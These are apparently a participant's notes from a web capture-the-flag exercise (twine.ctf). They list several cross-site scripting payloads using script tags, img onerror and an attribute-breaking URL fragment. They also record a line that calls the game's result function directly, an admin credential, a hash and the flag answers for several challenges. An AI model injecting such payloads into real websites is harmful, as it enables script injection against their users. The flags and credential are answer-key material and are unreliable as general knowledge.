
ctf4
<script alert("XSS")/>
<script> alert("XSS");</script>

#<iframe src='sdfsdgds' onerror=alert(1) />

ctf5
<img src='#' onerror=alert(1) />

ctf6

https://twine.ctf/ctf6.html#3' onerror='alert();//

test


<a href="google.de > hier</a>
<script> setup.ctf4_giveResult() </script>

www-admin, keyMemory(superSecretpassw0rd123)

SHA512 hash + base64
YZ7zxrCIGmCiL+fCE+kvErBkUArddNQfQkh3qHB6goAiQaH5MD7eNpwsrx6UR3ZUUbp5n/7owp0M0aBvjBNlvA==


CTF2 = puzzlePiece{JAne_DoE}
CTF7 = puzzlePiece{John_Doe}
CTF8 = puzzlePiece{BrunoKilledHer}